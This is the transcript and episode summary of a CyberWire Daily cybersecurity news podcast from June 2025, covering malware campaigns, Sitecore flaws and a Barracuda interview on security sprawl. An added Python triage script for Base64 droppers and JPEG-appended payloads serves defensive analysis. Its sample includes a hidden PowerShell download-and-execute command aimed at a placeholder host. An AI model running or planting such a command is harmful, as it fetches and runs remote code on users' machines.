Dave Bittner
You're listening to the CyberWire network, powered by N2K. And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. SpyCloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users, from breaches, malware and phishing, to neutralize identity-based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report at spycloud.com/cyberwire and see what attackers already know. That's spycloud.com/cyberwire. A House Oversight committee requests DOGE documents from Microsoft. Predatory Sparrow claims a cyberattack on an Iranian bank. Microsoft says data that happens in Europe will stay in Europe. A complex malware campaign is using heavily obfuscated Visual Basic files to deploy RATs. A widely used CMS platform suffers potential RCE. North Korea's Kimsuky targets academic institutions using password-protected research documents. ASUS patches a high-severity vulnerability in its Armoury Crate software. CISA's new leader remains in confirmation limbo. Our guest is Brian Downey, VP of Product Management from Barracuda, talking about how security sprawl increases risk. And Operation Fluffy Narwhal thinks it's time to rethink adversary naming.
Dave Bittner
It's Tuesday, June 17, 2025. I'm Dave Bittner, and this is your CyberWire Intel Briefing. Thanks for joining us here today. It's great, as always, to have you with us. Representative Stephen F. Lynch, Democrat from Massachusetts and acting ranking member of the Committee on Oversight and Government Reform, has requested documents from Microsoft CEO Satya Nadella regarding reports that individuals linked to Elon Musk's Department of Government Efficiency (DOGE) tried to remove sensitive data from the National Labor Relations Board. According to NPR and whistleblower reports, DOGE staff allegedly used high-level access to exfiltrate data, possibly including union activities, and hid their actions by deleting logs and installing backdoors. A DOGE engineer reportedly wrote code titled NxGenBdoorExtract and uploaded it to GitHub, which is owned by Microsoft. Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the NLRB. In April and May of this year, congressional Democrats launched investigations into Musk and DOGE's alleged interference and data breaches at the NLRB. A hacking group known as Predatory Sparrow, believed to be tied to Israeli intelligence, claimed a cyberattack on an Iranian bank. The group says the strike was in retaliation for the bank's alleged role in funding Iran's military and nuclear programs. The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches. The group claims support from brave Iranians and vowed to target institutions backing the dictator's terrorist fantasies. The hack follows rising tensions, including Israeli strikes on Iranian facilities and cyber retaliation by pro-Iranian groups. Predatory Sparrow has previously hit Iran's steel and fuel sectors. Iran has not commented.
Experts see escalating cyber conflict between Iran and Israel, with hacktivists warning regional allies of Israel that they could be targeted, too. Microsoft announced that data from its European cloud customers will remain in Europe, comply with EU laws and be managed by local staff. This move addresses growing concerns about foreign access to sensitive data. Microsoft also confirmed that any remote access by its engineers will be approved and monitored by European personnel. The company is expanding its cloud and AI operations in the region and plans to launch a sovereign private cloud, now in preview, by the end of the year. Researchers at Census have uncovered a complex malware campaign using heavily obfuscated Visual Basic Script files to deploy remote access trojans. Recently discovered, the attack unfolds in three stages, beginning with bloated VBS droppers that decode Base64 payloads and launch PowerShell scripts. These scripts fetch additional malware from platforms like archive.org, where payloads are hidden in JPEG images. The campaign delivers RATs such as Remcos, AsyncRAT, DcRAT and LimeRAT. It uses resilient infrastructure via DuckDNS.org to avoid takedowns. Though similar to attacks by the Blind Eagle group, attribution is unconfirmed. Researchers advise disabling macros, filtering emails, and monitoring PowerShell use to reduce risk. The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging. watchTowr has revealed seven serious vulnerabilities in Sitecore, a widely used CMS platform powering major companies like HSBC, United Airlines and L'Oréal. Three of the flaws, disclosed in a June 17 report, enable unauthenticated remote code execution on Sitecore Experience Platform 4.4.10. A key issue is a hardcoded default password which, when combined with two post-auth RCE bugs, creates a full pre-auth RCE chain.
watchTowr found over 22,000 exposed instances and warns the actual number is likely much higher. The vulnerabilities were patched in May after Sitecore was notified in February. No CVEs have been assigned yet. watchTowr urges immediate patching and credential rotation, warning of the high risk to enterprise environments. Four more flaws will be detailed in a future report. A new malware campaign by North Korea-linked Kimsuky is targeting academic institutions, using password-protected research documents to deliver multistage malware disguised as review requests from professors. Phishing emails contain Hangul Word Processor files with malicious OLE objects. These bypass security tools and trick recipients into opening them, launching a sophisticated infection chain. Upon activation, the malware installs six files, performs system reconnaissance and establishes remote access using AnyDesk. The campaign exploits academic trust and collaboration, making detection harder and expanding risks to connected government and private networks. The malware uses obfuscation techniques and disguises malicious actions under the appearance of legitimate documents. Analysts warn this campaign marks an evolution in social engineering, blending technical precision with realistic academic bait, and urge institutions to remain vigilant. ASUS has patched a high-severity vulnerability in its Armoury Crate software which could allow attackers to gain full system access. The flaw, an authorization bypass caused by a time-of-check/time-of-use issue, was discovered by Cisco Talos. Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armoury Crate. The bug affects multiple versions, and users are urged to update immediately to avoid privilege escalation risks. Sean Plankey, President Trump's nominee to lead CISA, remains in confirmation limbo due to procedural delays and a Senate hold.
Plankey, a former DOE and NSC cybersecurity official, missed his June hearing over an incomplete FBI clearance, causing some confusion and postponements. Despite bipartisan support for his qualifications, his nomination is blocked by Senator Ron Wyden, who demands CISA release a 2022 report on telecom vulnerabilities linked to the Salt Typhoon hack. Wyden accuses CISA of covering up critical cybersecurity failures and says public release of the report is vital. The delay hampers a major overhaul at CISA, including proposed budget cuts and staff reductions. With former acting director Bridget Bean gone, staff are concerned about leadership gaps and the agency's uncertain future under incoming Trump appointees. Coming up after the break, my conversation with Brian Downey from Barracuda. We're talking about how security sprawl increases risk. And Operation Fluffy Narwhal thinks it's time to rethink adversary naming. Stay with us.
Sponsor Voice
Compliance regulations, third-party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Vanta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials, from internal and third-party risk to consumer trust, making your security posture stronger and, yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC: how much easier trust can be. Get started at vanta.com/cyber.
Dave Bittner
And now a word from our sponsor, Cloud Range. Cybersecurity isn't just a technology issue. It's a people challenge. While tools can detect threats, it's the humans who decide how to respond. That's why Cloud Range uses immersive, simulation-based training to build real-world instincts and confidence. This approach helps transform good security teams into great ones, ready to face today's evolving threats. Discover how Cloud Range is empowering defenders at www.cloudrange.com. Brian Downey is VP of Product Management at Barracuda. I recently sat down and talked with him about how security sprawl increases risk.
Brian Downey
We started talking to our customers, and we started to hear the concerns they were having around the management of multiple security tools and how that was impacting them, really focusing on the operational inefficiencies. But as we dove in, beyond the operational inefficiencies, it also started to highlight that there were some security concerns with running multiple tools as well.
Dave Bittner
Well, let's dig into some of the numbers here. There's some really interesting stats in the report. What are some of the things that rose to the top for you that really caught your attention?
Brian Downey
Yeah, I'd say there were three different angles that I thought were interesting. First of all, it just seems like a ubiquitous problem. I've been telling a lot of people: as I started getting into working with a lot of managed service providers a couple of years back, I remember our goal was trying to figure out how we could get them to start using security tools and have those conversations with their clients. And there was almost a hesitancy to it. And now, when we looked at this report, we saw almost two-thirds, 65% of people that responded, said our challenge has now pivoted. They feel like we're juggling too many security tools. So you're seeing the tide change. Where at first it was trying to get them to start leveraging the tools they needed, now they're saying, hey, wait a second, I need to tap out, I'm having too many. I also thought it was interesting that, as you saw more security tools, you'd expect to see some impacts in cost and efficiency. And that was confirmed, with about 80% saying that this resulted in more time and cost they were spending. But the really surprising one for me was almost the same number, 77%, said the number of tools was hindering their ability to detect and mitigate threats. And I thought that was really surprising, to see that number so high.
Dave Bittner
What leads to this? Why do organizations end up over provisioned when it comes to their security tools?
Brian Downey
I think it's a necessary evil right now in security, where the reality is, as you're seeing that expanding attack surface, we are seeing more and more customers requiring a lot of different tools to be able to support the security needs that they have and their clients have. So I think there is a necessity to run it. But I think what we're seeing now is the vendor landscape really hasn't provided enough assistance in helping people run the plethora of security tools that are required to effectively secure them. And that's starting to lead to all sorts of new challenges. Like I said, both the time and cost, but also really simple things when you start looking at it: configuration issues. So having tools that are out there and having misconfigurations in them. We even saw that in the most recent Verizon data breach report; they talked about a third of issues that are discovered and breaches that occur coming from a poor configuration or a poorly configured tool. And you can see how that connects directly to this as you see more and more tools. How are you making sure, as things change, as you add new users, that they're configured correctly? That's where we're starting to see some real challenges associated with that. And I think that's where the vendor community has to step up and help customers with that.
Dave Bittner
When I think about this problem, I can't help wondering if part of this is a hesitation to get rid of something, to get rid of a tool, because I think there's a natural fear that if I get rid of a tool and then a breach occurs, that may have been the tool that could have stopped the breach. Boy, am I in trouble now, right? There's an emotional component there. Do you think there's anything to that line of thinking, or am I off base there?
Brian Downey
No, I think there is. I think we're definitely seeing more and more people that are holding on to maybe security tools that aren't needed, or they keep picking up tools. So I definitely think that's a portion of it. I think even as you get past that side of it, though, it's still the concepts of layered security and what attackers can now do with AI. I think it does require a pretty solid stack of tools right now to effectively secure even a small company, let alone larger and midsize companies. And I think that's something that is going to become a necessity as we move forward: that companies really adjust their operations to be able to support multiple tools in their environments.
Dave Bittner
Well, you mentioned AI. What part, if any, does that play in people's ability to dial down the number of tools that they have running?
Brian Downey
I think it might help in some ways, because I think tools can get more powerful. I think you will see tools be able to expand to maybe areas that would have required two or three in the past. But I really think where AI can help even more, and this is where we're focusing a little, is trying to help with the management overhead of those tools. AI is really good at doing things like identifying when you have a misconfiguration, for example; it can understand those anomalies and be able to help you react to them. And that's something that we've done with our BarracudaONE platform. If we look at it and stipulate to the reality that you're going to need multiple tools, that might be able to be a little more controlled than today, but it's probably going to be a reality we're going to live with, that you're going to have a lot of tools out there and you're going to have a lot of change in your environment. I think what we need to do is say, how do we simplify the management? How do we make sure that those tools can learn off one another and provide more value as you add tools, rather than see that diminished value the customers were describing in the survey?
Dave Bittner
So what are your recommendations then, for people to get on top of this?
Brian Downey
Yeah, I think you're right. I think the first one is the inventory of what you really need. What are you trying to protect against? Security, at the end of the day, everything we're doing is a means to an end. The end we're trying to reach is reducing risk. So I do think you need to look through that lens and say, how do all of these fit into my strategy around reducing risk? What value are they providing? And are they really additive to my environment? I think you don't want to be the hoarder of security tools. You want to have a lean relationship. But then I think you want to step back and say, okay, now, based on that, how do I want to manage these? How do I do this in a way that's going to be effective for my environment? And I think that's where there's a lot of platform-oriented tools that can help you. Barracuda, our platform, focuses on that, but there's a lot of others in the industry as well, where you can start to look at how you can actually take and leverage technology to be able to not only secure yourself, but to be able to apply that security in the right way that's effective for you.
Dave Bittner
Have you seen examples of folks who are having success here who have put a system in place where they're able to really dial it in effectively? I mean, are there, are there common elements for those organizations who seem to be doing well here?
Brian Downey
Yeah, I mean, I've seen a lot of customers that we've worked with that have done that, and I'm sure there's others as well. I think the big thing is being able to understand how they're answering certain questions. When I think about it, if you really make it very basic, it's: what security do I have deployed, where, how do I need that configured, what's within those parameters and what's drifting? You need to be able to answer those questions somehow. I think there's a lot of tooling out there that can help you, but if you can't answer those, you should realize that's a big risk for your environment. And I think this problem is exacerbated when you look at people like managed service providers, where you have a single IT shop that's managing dozens or even hundreds of customers. You can see how the problem gets bigger and bigger and bigger at that level of scale and differentiation between those accounts.
Dave Bittner
Can we touch on integration a bit here? I mean, I think people want their tools to be able to talk to each other and get a result where the whole is greater than the sum of the parts. How important is integration in selecting these tools?
Brian Downey
Yeah, I think integration has to be one of the foundational parameters you look at when you're selecting a tool. And that's something we saw even in this survey: the majority of people surveyed said their tools can't be integrated. I think integration comes in multiple forms. I think there's operational integration, around being able to do some of the things that we talked about, being able to manage them, ensure that they're configured, and all of those types of things, in an effective way. But then there's also the second side of it, which is the alerts these tools are providing back to the customer. Security has always been something where the power is in correlation of information. Being able to understand, I see something that looks suspicious on the network, I see something that looks suspicious in the user behavior, and I see something that looks suspicious in the endpoint itself. All three of those might just be seemingly a little bit suspicious, but all three combined might be a massive risk. So I think customers need to look at both sides of integration. They need to look at how am I integrating the operational management of these tools, as well as how am I taking the data that pours out of these tools and being able to correlate that and integrate it together, to be able to find more advanced threats more easily.
Dave Bittner
When you look at this report as a whole, what are the take homes for you? What do you hope security folks get out of it?
Brian Downey
I think the security folks have to start understanding what is the hub in their hub-and-spoke model of security. I think that as you look at the vendor landscape and as you look at the tools that you're using, you need to start creating that consolidation point. And again, that's both from an operational standpoint as well as from a threat and threat analysis standpoint. But you need to build off a core, and then you need to continue to add tools, and they might be part of that vendor's portfolio or third parties, but they need to be able to integrate back to that core and provide that consistency. So that's the biggest thing I would encourage vendors, I mean customers, to really understand: what is the core of their security? What is that hub and spoke? Where do they go to as a source of truth when it comes to the risks that are in their environment?
Dave Bittner
That's Brian Downey from Barracuda. And finally, when a Russian military unit hacks an election but we call them Fancy Bear, it's no wonder folks think cybersecurity is some elaborate comic book. In a sharply wry op-ed for Just Security, Jen Easterly and Ciaran Martin argue it's time to stop branding our cyber adversaries like Pokémon and start naming them for what they are: nation states and criminals. Microsoft and CrowdStrike's recent alliance to align threat actor names is a welcome baby step, but Easterly and Martin say it's not enough. Until the cybersecurity world adopts a single, clear, vendor-neutral naming system, we'll keep confusing defenders and glamorizing adversaries. The idea that naming can't be standardized is, they argue, nonsense. We do it in medicine, defense, and even for missiles. So why not malware? It's time to ditch the marketing mascots. Let's trade Charming Kitten for Iranian espionage and call the cybercriminals what they are, without the flair. Hallelujah. And that's the CyberWire. For links to all of today's stories, check out our daily briefing at thecyberwire.com. We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your interest through the end of this summer. There's a link in the show notes, and we do hope you'll check it out. N2K senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We're mixed by Trey Hester, with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow. Hey everybody, Dave here. I've talked about DeleteMe before, and I'm still using it because it still works. It's been a few months now, and I'm just as impressed today as I was when I signed up.
DeleteMe keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports, so I know exactly what's been taken down. I'm genuinely relieved knowing my privacy isn't something I have to worry about every day. The DeleteMe team handles everything. It's set-it-and-forget-it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees' personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your DeleteMe plan. Just go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K.
CyberWire Daily – Episode: "Can’t DOGE the Inquiry"
Release Date: June 17, 2025
Host: Dave Bittner, N2K Networks
In this episode of CyberWire Daily, host Dave Bittner covers a range of pressing cybersecurity issues, from a congressional inquiry and sophisticated malware campaigns to significant vulnerabilities in widely used software. The episode also features an interview with Brian Downey, VP of Product Management at Barracuda, on the challenges of security sprawl, and closes with a look at an op-ed calling for a rethink of adversary naming conventions.
Timestamp: [02:02]
Representative Stephen F. Lynch, Democrat from Massachusetts and acting ranking member of the Committee on Oversight and Government Reform, has formally requested documents from Microsoft CEO Satya Nadella. The inquiry centers on allegations that individuals linked to Elon Musk's Department of Government Efficiency (DOGE) attempted to exfiltrate sensitive data from the National Labor Relations Board (NLRB).
Notable Quote:
"Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the NLRB." [02:02]
Timestamp: [02:02]
A cyber group named Predatory Sparrow, believed to be affiliated with Israeli intelligence, has claimed responsibility for a cyberattack targeting an Iranian bank. The attack disrupted banking services, affecting gas stations, delaying salaries, and forcing some branches to close.
Notable Quote:
"The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches." [02:02]
Timestamp: [02:02]
Microsoft has announced that data from its European cloud customers will remain within Europe, adhering to EU laws and managed by local staff. This strategy addresses increasing concerns over foreign access to sensitive data.
Notable Quote:
"Microsoft confirmed that any remote access by its engineers will be approved and monitored by European personnel." [02:02]
Timestamp: [02:02]
A sophisticated malware campaign using heavily obfuscated Visual Basic Script files has been identified. It runs in three stages: bloated VBS droppers decode Base64 payloads and launch PowerShell, the PowerShell stage fetches follow-on payloads hidden in JPEG images hosted on platforms such as archive.org, and the final stage deploys Remote Access Trojans (RATs) such as Remcos, AsyncRAT, DcRAT, and LimeRAT, with command-and-control resilience provided via DuckDNS.org.
Notable Quote:
"The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging." [02:02]
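The three-stage chain summarized above (a Base64-carrying VBS dropper, a PowerShell fetch, a payload hidden in a JPEG on a public host) can be triaged statically before anything is executed. The Python below is an added example, not code from the researchers who reported the campaign or from the show notes: it pulls decodable Base64 blobs out of a script file, and it carves whatever has been appended after a JPEG's real end-of-image marker. The assumption that the payload is appended after the EOI marker is mine; the page only says the payload is hidden in the image. Every sample input here is constructed for the example and is not real malware.

```python
from __future__ import annotations

import base64
import re

# --- Stage 1: Base64 blobs inside an obfuscated script -----------------------

# A Base64 run of 40+ characters plus optional padding. Long identifiers and hex
# strings can also match, so every hit is decode-checked and text-checked below.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def looks_like_text(data: bytes) -> bool:
    """True if at least 90% of the bytes are printable ASCII or whitespace."""
    if not data:
        return False
    ok = sum(1 for c in data if 32 <= c < 127 or c in b"\r\n\t")
    return ok / len(data) >= 0.9


def find_base64_blobs(script: bytes, text_only: bool = True) -> list[bytes]:
    """Decode every Base64-looking run in a script. Text-only by default,
    because the droppers described hand the decoded bytes to PowerShell."""
    found = []
    for match in B64_RUN.finditer(script):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # length not a multiple of 4, or not really Base64
            continue
        if text_only and not looks_like_text(decoded):
            continue
        found.append(decoded)
    return found


# --- Stage 3: payload appended after a JPEG's real end-of-image marker -------

SOI, EOI, SOS = b"\xff\xd8", 0xD9, 0xDA


def find_eoi_offset(image: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past the true
    EOI marker, or -1. A plain search for FF D9 is not enough: an EXIF
    thumbnail inside an APP1 segment carries its own SOI/EOI pair."""
    if not image.startswith(SOI):
        return -1
    pos, n = 2, len(image)
    while pos + 2 <= n:
        if image[pos] != 0xFF:
            return -1                                  # lost marker sync
        marker = image[pos + 1]
        if marker == 0xFF:                             # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:   # standalone, no length field
            pos += 2
            continue
        if pos + 4 > n:
            return -1
        seg_len = int.from_bytes(image[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == SOS:
            # Entropy-coded data follows: FF 00 is a stuffed byte and FF D0..D7
            # are restart markers; any other byte after FF starts the next marker.
            while pos + 1 < n:
                nxt = image[pos + 1]
                if image[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return -1


def carve_after_eoi(image: bytes) -> bytes | None:
    """Return whatever trails the real EOI marker, or None if nothing does."""
    end = find_eoi_offset(image)
    if end < 0 or end >= len(image):
        return None
    return image[end:]


def extract_stage_from_image(image: bytes) -> list[bytes]:
    """Carve the trailer and decode any Base64 text it carries."""
    trailer = carve_after_eoi(image)
    return find_base64_blobs(trailer) if trailer else []


# --- Constructed samples (assumed shapes, not artifacts from the campaign) ----

STAGE2 = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
          b".DownloadString('http://example.invalid/next.jpg')\"")
APPENDED = base64.b64encode(STAGE2)

SAMPLE_VBS = (b"Dim junk1, junk2\r\n' " + b"A" * 10 + b"\r\n"
              + b'payload = "' + APPENDED + b'"\r\n'
              + b'CreateObject("WScript.Shell").Run payload\r\n')

SAMPLE_JPEG = (
    SOI
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    + b"\xff\xe1" + (12).to_bytes(2, "big") + b"Exif\x00\x00" + b"\xff\xd8\xff\xd9"          # APP1 with thumbnail
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"                      # SOS header
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"                                                    # scan data
    + b"\xff\xd9"                                                                            # real EOI
)
SAMPLE_JPEG_WITH_TRAILER = SAMPLE_JPEG + APPENDED

if __name__ == "__main__":
    for blob in find_base64_blobs(SAMPLE_VBS):
        print("dropper stage:", blob.decode())
    print("naive FF D9 search stops at offset", SAMPLE_JPEG_WITH_TRAILER.find(b"\xff\xd9"),
          "but the real EOI ends at", find_eoi_offset(SAMPLE_JPEG_WITH_TRAILER))
    for blob in extract_stage_from_image(SAMPLE_JPEG_WITH_TRAILER):
        print("image trailer stage:", blob.decode())
```

The marker walk is the part worth keeping: on the constructed image, `bytes.find(b"\xff\xd9")` stops inside the EXIF thumbnail at offset 32, while the real EOI ends at 54, so a naive carve would return image bytes rather than the trailer. Real droppers in this family typically split, reverse or re-encode their strings before Base64, so a deobfuscation pass may be needed before `find_base64_blobs` sees a single 40-plus character run.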
Timestamp: [02:02]
watchTowr has identified seven serious vulnerabilities in Sitecore, a widely used Content Management System (CMS) employed by major companies like HSBC, United Airlines, and L'Oréal. Three of these flaws, chained together (a hardcoded default password plus two post-authentication RCE bugs), allow unauthenticated remote code execution (RCE). More than 22,000 exposed instances were found; patches shipped in May, and no CVEs have been assigned yet.
Notable Quote:
"watchTowr urges immediate patching and credential rotation, warning of the high risk to enterprise environments." [02:02]
Timestamp: [02:02]
A new malware campaign attributed to the North Korea-linked group Kimsuky is targeting academic institutions by distributing password-protected research documents, delivered as Hangul Word Processor files carrying malicious OLE objects, that lead to remote access via AnyDesk.
Notable Quote:
"Analysts warn this campaign marks an evolution in social engineering, blending technical precision with realistic academic bait, and urge institutions to remain vigilant." [02:02]
Timestamp: [02:02]
ASUS has patched a high-severity vulnerability in its Armoury Crate software, discovered by Cisco Talos, which could allow attackers to gain full system access. The flaw is an authorization bypass rooted in a time-of-check/time-of-use race, exploitable by creating a hard link to sidestep restrictions on a driver the software uses.
Notable Quote:
"Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armory Crate." [02:02]
Timestamp: [02:02]
Sean Plankey, President Trump's nominee to lead the Cybersecurity and Infrastructure Security Agency (CISA), remains in confirmation limbo due to procedural delays, an incomplete FBI clearance that cost him his June hearing, and a Senate hold placed by Senator Ron Wyden.
Notable Quote:
"The delay hampers a major overhaul at CISA, including proposed budget cuts and staff reductions." [02:02]
Timestamp: [12:53 – 23:42]
Guest: Brian Downey, VP of Product Management at Barracuda
Topic: How security sprawl increases risk.
Brian Downey discusses the prevalent issue of security sprawl, where organizations manage an excessive number of security tools, leading to increased operational inefficiencies and heightened security risks.
Key Insights:
Downey attributes security sprawl to the expanding attack surface and the necessity for diverse tools to address varied security needs. However, the vendor landscape has not adequately supported the management of these multiple tools, leading to configuration issues and increased vulnerability to breaches.
Notable Quote:
"A third of issues that are discovered and breaches that occur come from a poor configuration or a poorly configured tool." [15:30]
Brian highlights the potential of AI to enhance the management of multiple security tools by automating the detection of misconfigurations and anomalies, thereby reducing the operational burden.
Notable Quote:
"AI can help with the management overhead of those tools... how do we simplify the management?" [17:41]
Downey emphasizes the importance of conducting a thorough inventory of security tools, assessing their value in reducing risk, and ensuring effective integration to create a cohesive security ecosystem.
Notable Quote:
"You need to look at that lens and say... how do all of these fit into my strategy around reducing risk?" [18:43]
Timestamp: [23:42]
Dave Bittner highlights an op-ed in Just Security by Jen Easterly and Ciaran Martin, advocating a shift from the whimsical, vendor-specific naming conventions for cyber adversaries (e.g., Fancy Bear) to a single, vendor-neutral scheme with descriptive terms that reflect what these actors are.
Notable Quote:
"It's time to stop branding our cyber adversaries like Pokémon and start naming them for what they are: nation states and criminals." [23:42]
This episode of CyberWire Daily provides an overview of current cybersecurity challenges, from congressional inquiries and international cyber conflict to the practical problem of managing security tooling within organizations. The discussion with Brian Downey underscores the need for streamlined security tool management and effective integration to mitigate the risks associated with security sprawl. The closing call for standardized adversary naming aims to foster a more serious and unified approach to cyber defense.
Connect with CyberWire Daily:
For more detailed information on today's stories, visit thecyberwire.com or participate in the annual audience survey via the link in the show notes.